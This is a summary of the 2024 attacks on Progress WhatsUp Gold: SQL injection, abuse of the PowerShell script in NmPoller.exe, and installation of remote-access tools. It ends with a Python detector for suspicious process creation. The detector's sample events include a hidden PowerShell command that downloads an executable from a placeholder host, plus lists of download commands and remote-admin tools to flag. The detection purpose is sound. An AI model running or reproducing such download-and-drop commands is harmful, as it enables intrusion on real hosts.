Malicious actors have been exploiting critical vulnerabilities in Progress Software WhatsUp Gold since August 30, 2024, leading to potential ransomware attacks and the installation of remote administration tools on Windows hosts.

Description

Attacks on WhatsUp Gold began shortly after a proof-of-concept (PoC) for CVE-2024-6670 was made public [4], targeting vulnerabilities with a CVSS score of 9.8 [2]. These vulnerabilities, CVE-2024-6670 and CVE-2024-6671 [1] [2], allow attackers to retrieve encrypted passwords via SQL injection in single-user configurations [2].

The attacks involve bypassing authentication to abuse the Active Monitor PowerShell Script within the NmPoller.exe process [3] [6] [7], enabling the installation of remote administration tools such as Atera Agent [2], Radmin RAT [2], SimpleHelp remote access software [2] [3] [6] [7], and Splashtop Remote for persistence on Windows hosts. Trend Micro researchers have observed potential ransomware actor involvement in these attacks.

A security patch addressing both CVE-2024-4885 and CVE-2024-6670 was released on August 16, 2024 [2]. This is the second instance of vulnerabilities in WhatsUp Gold being actively weaponized [3] [6] [7], following a previous exploitation attempt against CVE-2024-4885 [3] [7]. Separately, Trend Micro has reported exploitation of a patched security flaw in Atlassian Confluence to deliver the Godzilla web shell [7].

Despite the availability of patches [1], some organizations were slow to apply them [1] [6], leading to incidents shortly after the PoC was published [1]. Mitigation measures include restricting access to corporate services [1], promptly applying patches [1], and monitoring for suspicious process creation events in WhatsUp Gold environments to prevent similar attacks [1]. Security teams should also watch for unusual process creation events and downloads from suspicious URLs to detect potential compromises [5]. Trend Micro recommends immediate action to protect against these critical vulnerabilities [5].
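As an added illustration of the process-creation monitoring recommended above (example code written for this summary, not code from Trend Micro, Progress or any referenced source), the following Python flags events in which NmPoller.exe spawns a script host, the spawned script host issues a download command, or a remote administration tool named in the summary is launched. The Sysmon-style field names, the installation paths, the sample events and the placeholder URL are all assumptions constructed for the example.

```python
import re
from typing import Optional
from pathlib import PureWindowsPath

# Remote administration tools the summary names as attacker-installed.
REMOTE_ADMIN_TOOLS = ("atera", "radmin", "simplehelp", "splashtop")
# Script hosts an Active Monitor PowerShell script would be launched through.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe")
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\bcurl\b|\bwget\b|bitsadmin", re.I)

# Constructed sample events (Sysmon Event ID 1 style fields); paths and URL are placeholders.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe", "cmdline": "NmPoller.exe"},
    {"pid": 1002, "parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://placeholder.invalid/a.exe'
                ' -OutFile C:\\Users\\Public\\a.exe"'},
    {"pid": 1003, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\AteraAgent.exe", "cmdline": "AteraAgent.exe /quiet"},
    {"pid": 1004, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, so matching ignores install location."""
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None when nothing matches."""
    parent, image = _base(event["parent"]), _base(event["image"])
    cmdline = event.get("cmdline", "")
    reasons = []
    if parent == "nmpoller.exe" and image in SCRIPT_HOSTS:
        reasons.append("script host spawned by NmPoller.exe (Active Monitor script abuse)")
        if DOWNLOAD_RE.search(cmdline):
            reasons.append("download command in script host command line")
    if any(t in image or t in cmdline.lower() for t in REMOTE_ADMIN_TOOLS):
        reasons.append("remote administration tool referenced")
    if not reasons:
        return None
    # High when the poller itself launches the child, when a script host starts an
    # admin tool, or when several indicators coincide; otherwise medium, for triage.
    high = parent == "nmpoller.exe" or parent in SCRIPT_HOSTS or len(reasons) > 1
    return {"pid": event["pid"], "severity": "high" if high else "medium", "reasons": reasons}

def scan(events) -> list:
    """Run classify() over a sequence of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Legitimate administrators who install one of these tools will also produce medium findings, so the rule is a triage signal to pair with the parent-process context rather than an automatic block.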

Conclusion

The exploitation of vulnerabilities in WhatsUp Gold and Atlassian Confluence highlights the importance of prompt patching and monitoring for suspicious activities to prevent potential compromises. Organizations should take immediate action to protect against these critical vulnerabilities and safeguard their systems from malicious attacks.

References

[1] https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html
[2] https://cybersecuritynews.com/hackers-exploit-whatsup-rce-vulnerability/
[3] https://thecyberpost.com/news/hackers/progress-whatsup-gold-exploited-just-hours-after-poc-release-for-critical-flaw/
[4] https://www.krofeksecurity.com/breaking-whatsup-gold-vulnerability-critical-exploit-reported-hours-after-poc-release/
[5] https://securityonline.info/whatsup-gold-under-attack-new-rce-vulnerabilities-exploited/
[6] https://vulners.com/thn/THN:05EC256E6F360D0F47176ABF405F791D
[7] https://thehackernews.com/2024/09/progress-whatsup-gold-exploited-just.html